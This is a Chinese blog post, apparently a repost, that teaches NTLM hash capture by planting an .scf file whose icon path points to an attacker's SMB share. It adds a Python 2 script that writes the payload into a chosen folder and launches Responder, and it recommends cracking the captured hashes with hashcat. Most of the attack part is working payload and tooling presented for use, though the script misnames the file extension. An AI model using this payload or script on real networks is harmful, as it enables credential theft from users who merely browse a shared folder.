利用sfc文件构建网络渗透

 

收集哈希

SCF(Shell命令文件)文件可用于执行一组有限的操作,例如显示Windows桌面或打开Windows资源管理器,这并不是什么新鲜事。然而,一个SCF文件可以用来访问一个特定的UNC路径,允许渗透测试人员构建攻击。下面的代码可以被放置在一个文本文件,然后需要被植入到网络共享。
代码:
[Shell] Command=2 IconFile=\\攻击者的IP\share\pentestlab.ico [Taskbar] Command=ToggleDesktop
目标机IP:192.168.3.27
攻击者IP:192.168.3. 21

写入文件后保存为@table.scf

 

注:@的意思就是将其置顶
然后在攻击机里开启:responder -wrf --lm -v -I etho 看你的IP选择网络设备
然后将那个文件进行网络共享。只要有人浏览了该文件夹。那么就能获取受害者的hash

 


然后使用hashcat来跑就ok。我们可以用hashidentifier.py来判断Hash类型
------------------------------------------------------------------------------------------------------------------
然后我觉得就这样发布感觉对不起自己,然后就用py写了个脚本。
首先我们来说说实现思路:
1.获取本机IP
2.在指定文件夹内生成*.scaf,并写入exp
3.执行responder -wrf --Im -v -I 网卡设备
实现代码:
import os
import socket
logo="""
     
    
       _==/          i     i          \==_
     /XX/            |\___/|            \XX\
   /XXXX\            |XXXXX|            /XXXX\
  |XXXXXX\_         _XXXXXXX_         _/XXXXXX|
 XXXXXXXXXXXxxxxxxxXXXXXXXXXXXxxxxxxxXXXXXXXXXXX
|XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX|
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
|XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX|
 XXXXXX/^^^^"\XXXXXXXXXXXXXXXXXXXXX/^^^^^\XXXXXX
  |XXX|       \XXX/^^\XXXXX/^^\XXX/       |XXX|
    \XX\       \X/    \XXX/    \X/       /XX/
       "\       "      \X/      "      /"
     """
print logo
def folders():
    global losd
    global ip
    print '[+]Here we will first create a SCAF file .'
    print '[+]Please enter which file you want to create .'
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    low = s.connect(('8.8.8.8', 80))
    ip = s.getsockname()[0]
    print '[+]Get to local IP:{}'.format(ip)
    losd=raw_input('position:')
    if os.path.exists(losd) == True:
        print '[+]Folders exist'
    else:
        print '[-]Not Found Folders .'
        exit()
folders()

def scaf():
    try:
      fw=open('{}/@table.scaf'.format(losd),'w')
      payload='''
      [Shell]
      Command=2
      IconFile=\\{}\share\pentestlab.ico
      [Taskbar]
      Command=ToggleDesktop
              '''.format(ip)
      fw.write(payload)
      print '[+]Generating SACF files successfully !'
    except Exception , g:
        print '[-]Error:',g

    try:
        usew=raw_input('Please enter the network device:')
        os.system('responder -wrf --lm -v -I {}'.format(usew))
    except Exception ,l:
        print '[-]Error:',l
scaf()

 运行截图:

 

 

 

转载于:https://www.cnblogs.com/haq5201314/p/8634100.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值